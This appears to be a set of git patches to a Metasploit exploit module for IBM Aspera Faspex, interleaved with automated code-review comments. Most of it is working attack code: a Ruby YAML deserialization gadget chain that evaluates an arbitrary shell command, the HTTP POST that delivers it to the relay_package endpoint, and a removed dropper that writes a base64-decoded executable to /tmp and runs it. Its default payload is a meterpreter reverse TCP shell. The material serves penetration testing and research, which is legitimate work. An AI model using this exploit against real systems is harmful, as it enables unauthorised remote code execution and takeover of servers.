diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 849b7b7dead5..bbef8c80edc9 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::FileDropper
 include Msf::Exploit::Remote::CheckModule
 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
 def initialize(info = {})
 super(
@@ -42,18 +43,20 @@ def initialize(info = {})
 },
 'Targets' => [
 [
- 'Automatic (Dropper)',
+ 'Unix Command',
 {
- 'Platform' => 'linux',
- 'Arch' => [ARCH_X64, ARCH_X86],
- 'Type' => :linux_dropper,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
 'DefaultOptions' => {
- 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
- 'DisablePayloadHandler' => 'false'
+ 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',
+ 'RPORT' => 9000
 }
 }
 ],
 ],
+ 'CmdStagerFlavor' => [ 'echo' ],
+ 'Payload' => { 'BadChars' => '`' },
 'DefaultTarget' => 0,
 'Notes' => {
 'Stability' => [CRASH_SAFE],
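Review bot: The target's `'DefaultOptions'` now set `'RPORT' => 9000`, which overrides the module-level `'RPORT' => 443` that sits a few lines above this hunk next to `'SSL' => true` whenever this (only) target is selected. If 9000 is meant for the payload listener rather than the HTTP service, the key should be `LPORT`; if the service really is expected on 9000, `SSL` needs the same review. Either way the intent deserves a comment on that line, e.g. `# overrides the module-level RPORT 443 because …`. `[ 'echo' ]` also carries inner bracket spaces that the rest of the file avoids.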
@@ -126,13 +129,7 @@ def execute_command(command, _opts = {})
 end
 def exploit
- file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
- cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
-
- print_status("Sending #{datastore['PAYLOAD']} command payload")
- vprint_status("Generated command payload: #{cmd}")
-
- execute_command(cmd)
-
+ print_status('Exploiting...')
+ execute_cmdstager
 end
 end
From d53994f9b5912333c9634a44a7507e07584aaa28 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 20:50:14 +0000
Subject: [PATCH 20/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Jeffrey Martin
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index bbef8c80edc9..cf52ac973763 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -102,7 +102,7 @@ def execute_command(command, _opts = {})
 ],
 "external_emails": "#{exploit}",
 "package_name": "assetnote_pack",
- "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
+ "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
 "original_sender_name": "#{Rex::Text.rand_name()}",
 "package_uuid": "#{uuid}",
 "metadata_human_readable": "Yes",
From 65f78ca8fdebbf78a1c35ad29d0a66241070aab8 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Mon, 22 May 2023 17:27:04 +0000
Subject: [PATCH 21/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 1 -
 1 file changed, 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index cf52ac973763..b2a164685a1c 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::EXE
 include Msf::Exploit::FileDropper
- include Msf::Exploit::Remote::CheckModule
 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::CmdStager
From 6471007516bf1a45ac0b57ac31ba8c31ad067303 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Mon, 22 May 2023 17:27:17 +0000
Subject: [PATCH 22/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index b2a164685a1c..142afdc4ee63 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -129,6 +129,6 @@ def execute_command(command, _opts = {})
 def exploit
 print_status('Exploiting...')
- execute_cmdstager
+ execute_command(payload.encoded)
 end
 end
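Review bot: Dropping `Msf::Exploit::Remote::CheckModule` is right, but `Msf::Exploit::EXE` and `Msf::Exploit::FileDropper` on the two context lines just above it stay included even though nothing has called `generate_payload_exe` or `register_file_for_cleanup` since patches 15 and 19 removed those calls; both `include` lines can go with this change. Unused mixins still add options and behaviour to the module that a reader will look for and not find.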
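Review bot: With `execute_cmdstager` replaced by `execute_command(payload.encoded)`, the `include Msf::Exploit::CmdStager` line and the `'CmdStagerFlavor' => [ 'echo' ]` entry introduced in patch 19 (both outside this hunk) are dead and should be removed in the same change. `exploit` also still ignores the value `execute_command` returns, so a missing response is never reported; `fail_with(Failure::Unreachable, 'No response from the target') unless execute_command(payload.encoded)` would surface it. `print_status('Exploiting...')` says nothing about what is being sent; `print_status("Sending #{datastore['PAYLOAD']} to #{peer}")` is more useful in the log.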
From a336652c433c2922796bfcd629153208ab5e0809 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Fri, 14 Jul 2023 13:18:17 -0400
Subject: [PATCH 23/23] Minor fixes including payload encoding
---
 ..._aspera_faspex_rce_yaml_deserialization.rb | 96 +++++++++----------
 1 file changed, 48 insertions(+), 48 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 142afdc4ee63..0f114506cc30 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -64,61 +64,61 @@ def initialize(info = {})
 }
 )
 )
+ register_options(
+ [OptString.new('TARGETURI', [ false, 'The base path for the IBM Aspera Faspex Application.', '/aspera/faspex'])]
+ )
 end
- def execute_command(command, _opts = {})
- exploit = %Q(
----
-- !ruby/object:Gem::Installer
- i: x
-- !ruby/object:Gem::SpecFetcher
- i: y
-- !ruby/object:Gem::Requirement
- requirements:
- !ruby/object:Gem::Package::TarReader
- io: &1 !ruby/object:Net::BufferedIO
- io: &1 !ruby/object:Gem::Package::TarReader::Entry
- read: 0
- header: "pew"
- debug_output: &1 !ruby/object:Net::WriteAdapter
- socket: &1 !ruby/object:PrettyPrint
- output: !ruby/object:Net::WriteAdapter
- socket: &1 !ruby/module "Kernel"
- method_id: :eval
- newline: "throw `#{command}`"
- buffer: {}
- group_stack:
- - !ruby/object:PrettyPrint::Group
- break: true
- method_id: :breakable
- ).gsub(/\n/, '\n').gsub(/"/, '\"')
+ exploit = <<~EOT
+ ---
+ - !ruby/object:Gem::Installer
+ i: x
+ - !ruby/object:Gem::SpecFetcher
+ i: y
+ - !ruby/object:Gem::Requirement
+ requirements:
+ !ruby/object:Gem::Package::TarReader
+ io: &1 !ruby/object:Net::BufferedIO
+ io: &1 !ruby/object:Gem::Package::TarReader::Entry
+ read: 0
+ header: "pew"
+ debug_output: &1 !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/object:PrettyPrint
+ output: !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/module "Kernel"
+ method_id: :eval
+ newline: "throw `#{command}`"
+ buffer: {}
+ group_stack:
+ - !ruby/object:PrettyPrint::Group
+ break: true
+ method_id: :breakable
+ EOT
+ uuid = SecureRandom.uuid
- uuid = SecureRandom.uuid
- payload = %Q({
- "package_file_list": [
- "/"
- ],
- "external_emails": "#{exploit}",
- "package_name": "assetnote_pack",
- "package_note": "#{Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
- "original_sender_name": "#{Rex::Text.rand_name()}",
- "package_uuid": "#{uuid}",
- "metadata_human_readable": "Yes",
- "forward": "pew",
- "metadata_json": "{}",
- "delivery_uuid": "#{uuid}",
- "delivery_sender_name": "#{Rex::Text.rand_name()}",
- "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}",
- "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}",
- "delete_after_download": true,
- "delete_after_download_condition": "IDK"
-})
+ payload = {
+ "package_file_list[]": '/',
+ external_emails: exploit,
+ package_name: 'assetnote_pack',
+ package_note: Rex::Text.rand_text(50, bad: '', chars: 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15).to_s,
+ original_sender_name: Rex::Text.rand_name.to_s,
+ package_uuid: uuid.to_s,
+ metadata_human_readable: 'Yes',
+ forward: 'pew',
+ metadata_json: '{}',
+ delivery_uuid: uuid.to_s,
+ delivery_sender_name: Rex::Text.rand_name.to_s,
+ delivery_title: Rex::Text.rand_text_alphanumeric(4).to_s,
+ delivery_note: Rex::Text.rand_text_alphanumeric(12).to_s,
+ delete_after_download: true,
+ delete_after_download_condition: 'IDK'
+ }
 response = send_request_raw({
 'method' => 'POST',
- 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
- 'data' => payload
+ 'uri' => normalize_uri(datastore['TARGETURI'], '/package_relay/relay_package'),
+ 'data' => URI.encode_www_form(payload)
 })
 if response && response.body
 return response.body
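Review bot: The new `'data' => URI.encode_www_form(payload)` line hands `send_request_raw` a form-encoded body with no `'ctype'`, so the request carries no `Content-Type` header and correct parsing of the body depends on the server treating a POST without a content type as form data; `send_request_cgi` with `'vars_post' => payload.transform_keys(&:to_s)` does the same encoding and sets `application/x-www-form-urlencoded` explicitly. The `.to_s` calls on `Rex::Text.rand_name`, `rand_text`, `rand_text_alphanumeric` and `uuid` are redundant since each already yields a String, and `"package_file_list[]": '/'` mixes a quoted key with the bare symbol keys around it. The locals `exploit` and `payload` shadow the `exploit` and `payload` methods of `Msf::Exploit`, which is a readability trap now that `exploit` (outside this hunk) calls `payload.encoded`. The switch to `<<~EOT` relies on the squiggly heredoc removing only the common indent so the YAML nesting survives; a one-line comment above it, `# <<~ strips only the shared indent, so the relative YAML indentation below is preserved`, would spare the next reader a check.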